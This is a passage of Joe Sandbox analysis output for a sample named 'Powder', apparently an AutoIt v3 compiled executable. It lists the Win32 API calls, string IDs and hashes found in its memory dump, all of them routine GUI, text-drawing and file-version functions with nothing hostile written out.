                                                  • Instruction Fuzzy Hash: 90A0223002020CFFCF002FA3FC08888BFACEB002A0B808023F80C00032CB33A8208AC0
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00E90980), ref: 00E83C65
                                                  • IsWindowVisible.USER32(?), ref: 00E83C89
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: 8e9c896c420482a10e8c5801a45c1462d1e9177f7b203d8fca89338aff795c34
                                                  • Instruction ID: 10813e981b664d910222d6870291d42a05a1be9887014857dfdc063cdaca55d9
                                                  • Opcode Fuzzy Hash: 8e9c896c420482a10e8c5801a45c1462d1e9177f7b203d8fca89338aff795c34
                                                  • Instruction Fuzzy Hash: 2ED16270204215CBCB04FF60C551AAAB7E1EF94744F246858F9597B2E3CB31EE4ACB92
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 00E8AC55
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E8AC86
                                                  • GetSysColor.USER32(0000000F), ref: 00E8AC92
                                                  • SetBkColor.GDI32(?,000000FF), ref: 00E8ACAC
                                                  • SelectObject.GDI32(?,?), ref: 00E8ACBB
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8ACE6
                                                  • GetSysColor.USER32(00000010), ref: 00E8ACEE
                                                  • CreateSolidBrush.GDI32(00000000), ref: 00E8ACF5
                                                  • FrameRect.USER32(?,?,00000000), ref: 00E8AD04
                                                  • DeleteObject.GDI32(00000000), ref: 00E8AD0B
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 00E8AD56
                                                  • FillRect.USER32(?,?,?), ref: 00E8AD88
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E8ADB3
                                                    • Part of subcall function 00E8AF18: GetSysColor.USER32(00000012), ref: 00E8AF51
                                                    • Part of subcall function 00E8AF18: SetTextColor.GDI32(?,?), ref: 00E8AF55
                                                    • Part of subcall function 00E8AF18: GetSysColorBrush.USER32(0000000F), ref: 00E8AF6B
                                                    • Part of subcall function 00E8AF18: GetSysColor.USER32(0000000F), ref: 00E8AF76
                                                    • Part of subcall function 00E8AF18: GetSysColor.USER32(00000011), ref: 00E8AF93
                                                    • Part of subcall function 00E8AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8AFA1
                                                    • Part of subcall function 00E8AF18: SelectObject.GDI32(?,00000000), ref: 00E8AFB2
                                                    • Part of subcall function 00E8AF18: SetBkColor.GDI32(?,00000000), ref: 00E8AFBB
                                                    • Part of subcall function 00E8AF18: SelectObject.GDI32(?,?), ref: 00E8AFC8
                                                    • Part of subcall function 00E8AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 00E8AFE7
                                                    • Part of subcall function 00E8AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8AFFE
                                                    • Part of subcall function 00E8AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 00E8B013
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: 6f28af4c574551f716937e7616ae6371e2a365e5414a9c6beaedb344f85bbd81
                                                  • Instruction ID: 5941956cced45769557e37c2d380e855f5aa6c706316369b63f5803af49687ac
                                                  • Opcode Fuzzy Hash: 6f28af4c574551f716937e7616ae6371e2a365e5414a9c6beaedb344f85bbd81
                                                  • Instruction Fuzzy Hash: 9BA19272009301AFD711AF65DC08E6BBBA9FF48325F541A2BF95AA61E0D730D844CF52
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00E03072
                                                  • DeleteObject.GDI32(00000000), ref: 00E030B8
                                                  • DeleteObject.GDI32(00000000), ref: 00E030C3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00E030CE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00E030D9
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E3C77C
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E3C7B5
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E3CBDE
                                                    • Part of subcall function 00E01F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02412,?,00000000,?,?,?,?,00E01AA7,00000000,?), ref: 00E01F76
                                                  • SendMessageW.USER32(?,00001053), ref: 00E3CC1B
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E3CC32
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3CC48
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00E3CC53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: 9dbbbff7e65bd16c4fccfc6759194802c59e0eee0d9167c560850bebea467976
                                                  • Instruction ID: 1393568a00bd14a665a379da005b644c8ab40cbdecfed3dcb02f12e04594e88a
                                                  • Opcode Fuzzy Hash: 9dbbbff7e65bd16c4fccfc6759194802c59e0eee0d9167c560850bebea467976
                                                  • Instruction Fuzzy Hash: 8D12A030605201EFDB25CF24C888BA5BBE5BF44304F64656AF985FB2A2C731ED85CB91
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 2660009612-1645009161
                                                  • Opcode ID: ccec6dac26fb2da8fb9b2a5d0acf2d49c34ec1ff889ede9c255eec969b166a63
                                                  • Instruction ID: 566e036d0833e98d08872c80e597b6bdd6cf7d449c4bb2fa8f18d16c3eb1a136
                                                  • Opcode Fuzzy Hash: ccec6dac26fb2da8fb9b2a5d0acf2d49c34ec1ff889ede9c255eec969b166a63
                                                  • Instruction Fuzzy Hash: 11A19130A00209BBCB14AF61EC42EEE77B4AF45744F14606DFA05BB296DB71DAA1D750
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00E77BC8
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E77C87
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E77CC5
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E77CD7
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E77D1D
                                                  • GetClientRect.USER32(00000000,?), ref: 00E77D29
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E77D6D
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E77D7C
                                                  • GetStockObject.GDI32(00000011), ref: 00E77D8C
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00E77D90
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E77DA0
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E77DA9
                                                  • DeleteDC.GDI32(00000000), ref: 00E77DB2
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E77DDE
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E77DF5
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E77E30
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E77E44
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E77E55
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E77E85
                                                  • GetStockObject.GDI32(00000011), ref: 00E77E90
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E77E9B
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E77EA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 9319ca560ab211578a482f7f77272f534b9c8ffac1e52d25e5ca489d76a66d30
                                                  • Instruction ID: 76fc886f43d3a67458aa63034f7de3f6584e749980405e86fddb8d5c8f5168e4
                                                  • Opcode Fuzzy Hash: 9319ca560ab211578a482f7f77272f534b9c8ffac1e52d25e5ca489d76a66d30
                                                  • Instruction Fuzzy Hash: 95A16FB1A00215AFEB14DBA5DC4AFAFBBA9EB48710F008515FA15B72E0C771AD45CF60
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00E6B361
                                                  • GetDriveTypeW.KERNEL32(?,00E92C4C,?,\\.\,00E90980), ref: 00E6B43E
                                                  • SetErrorMode.KERNEL32(00000000,00E92C4C,?,\\.\,00E90980), ref: 00E6B59C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 969d3fa9aac59ba5044c33ad48fb1a76cb677afe9f1dc2e8471238d2012f04be
                                                  • Instruction ID: a58745b4866e0d62c6ba05b6543da3e487258af46059e41f8a978f11cf0141e6
                                                  • Opcode Fuzzy Hash: 969d3fa9aac59ba5044c33ad48fb1a76cb677afe9f1dc2e8471238d2012f04be
                                                  • Instruction Fuzzy Hash: E3516670B80309DB8700DB60E9429FE7BE2BB457847247167E407F7291EBB1AEC18751
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00E8A0F7
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00E8A1B0
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00E8A1CC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: d08954afaf19bf151e4085107938daaa3b2dbb083c4185085758c4e28dea6b13
                                                  • Instruction ID: 614f065be81763c35936dc5580468f887ff48f1bd250c2b17e168908f4c70231
                                                  • Opcode Fuzzy Hash: d08954afaf19bf151e4085107938daaa3b2dbb083c4185085758c4e28dea6b13
                                                  • Instruction Fuzzy Hash: 0C02D170108301AFEB25DF14C848BAABBE4FF45318F08952FF99DA62A1C775D944CB52
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00E8AF51
                                                  • SetTextColor.GDI32(?,?), ref: 00E8AF55
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E8AF6B
                                                  • GetSysColor.USER32(0000000F), ref: 00E8AF76
                                                  • CreateSolidBrush.GDI32(?), ref: 00E8AF7B
                                                  • GetSysColor.USER32(00000011), ref: 00E8AF93
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8AFA1
                                                  • SelectObject.GDI32(?,00000000), ref: 00E8AFB2
                                                  • SetBkColor.GDI32(?,00000000), ref: 00E8AFBB
                                                  • SelectObject.GDI32(?,?), ref: 00E8AFC8
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8AFE7
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8AFFE
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00E8B013
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8B05F
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00E8B086
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00E8B0A4
                                                  • DrawFocusRect.USER32(?,?), ref: 00E8B0AF
                                                  • GetSysColor.USER32(00000011), ref: 00E8B0BD
                                                  • SetTextColor.GDI32(?,00000000), ref: 00E8B0C5
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00E8B0D9
                                                  • SelectObject.GDI32(?,00E8AC1F), ref: 00E8B0F0
                                                  • DeleteObject.GDI32(?), ref: 00E8B0FB
                                                  • SelectObject.GDI32(?,?), ref: 00E8B101
                                                  • DeleteObject.GDI32(?), ref: 00E8B106
                                                  • SetTextColor.GDI32(?,?), ref: 00E8B10C
                                                  • SetBkColor.GDI32(?,?), ref: 00E8B116
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: ed5af122844450b1c15398033db622a55a5d805bd414c2d70184053a368dbb42
                                                  • Instruction ID: 430512dcdec15936bc2052b6c065538ab7a210922ebbd8a1922b607dce24c92d
                                                  • Opcode Fuzzy Hash: ed5af122844450b1c15398033db622a55a5d805bd414c2d70184053a368dbb42
                                                  • Instruction Fuzzy Hash: 97615B72901218EFDF11AFA9DC48AAE7B79FF08320F154116FA19BB2A1D7719944CF90
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E890EA
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E890FB
                                                  • CharNextW.USER32(0000014E), ref: 00E8912A
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E8916B
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E89181
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E89192
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00E891AF
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00E891FB
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00E89211
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E89242
                                                  • _memset.LIBCMT ref: 00E89267
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00E892B0
                                                  • _memset.LIBCMT ref: 00E8930F
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E89339
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E89391
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00E8943E
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00E89460
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E894AA
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E894D7
                                                  • DrawMenuBar.USER32(?), ref: 00E894E6
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00E8950E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: ede3b9886f40ba0653be56ee8f841920704c25ec57f72adf4afacfe6d6ec4b15
                                                  • Instruction ID: c36e77c66377de7f2e76048148a242764f8d59d167fb20c34590dfafc1bd75ce
                                                  • Opcode Fuzzy Hash: ede3b9886f40ba0653be56ee8f841920704c25ec57f72adf4afacfe6d6ec4b15
                                                  • Instruction Fuzzy Hash: 41E19F71900218AFDB21AF91CC88EFE7BB8EF05714F189156F91DBA192D7708A85DF60
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00E85007
                                                  • GetDesktopWindow.USER32 ref: 00E8501C
                                                  • GetWindowRect.USER32(00000000), ref: 00E85023
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00E85085
                                                  • DestroyWindow.USER32(?), ref: 00E850B1
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00E850DA
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E850F8
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00E8511E
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00E85133
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00E85146
                                                  • IsWindowVisible.USER32(?), ref: 00E85166
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00E85181
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00E85195
                                                  • GetWindowRect.USER32(?,?), ref: 00E851AD
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00E851D3
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00E851ED
                                                  • CopyRect.USER32(?,?), ref: 00E85204
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00E8526F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 39c9f9eea1a560ab358b3eca7f71fc65aafd8fc34753c66f60b449406c168bdb
                                                  • Instruction ID: 01100ab0a803818bebe87ba006542cfa075c4583d7f3ad44506604e812fa5bc8
                                                  • Opcode Fuzzy Hash: 39c9f9eea1a560ab358b3eca7f71fc65aafd8fc34753c66f60b449406c168bdb
                                                  • Instruction Fuzzy Hash: 2FB17A72604740AFD704EF65C848B6ABBE4FF88314F00991DF59DAB2A1DB71E845CB92
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E6499C
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E649C2
                                                  • _wcscpy.LIBCMT ref: 00E649F0
                                                  • _wcscmp.LIBCMT ref: 00E649FB
                                                  • _wcscat.LIBCMT ref: 00E64A11
                                                  • _wcsstr.LIBCMT ref: 00E64A1C
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E64A38
                                                  • _wcscat.LIBCMT ref: 00E64A81
                                                  • _wcscat.LIBCMT ref: 00E64A88
                                                  • _wcsncpy.LIBCMT ref: 00E64AB3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 105630ff08cd50cbd93ff2dac9a9bf8563f5c232aac37221d4f5bd20fbce3f51
                                                  • Instruction ID: 2427ba10cac7d556b16a61cf1cce5bee56b3078d04583341f0fedafc55e5f7bb
                                                  • Opcode Fuzzy Hash: 105630ff08cd50cbd93ff2dac9a9bf8563f5c232aac37221d4f5bd20fbce3f51
                                                  • Instruction Fuzzy Hash: 0D412972A403147AEB15BB70AD43EBF77ECEF45350F00205AFA05B61D2FB749A0196A5
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E02C8C
                                                  • GetSystemMetrics.USER32(00000007), ref: 00E02C94
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E02CBF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00E02CC7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00E02CEC
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E02D09
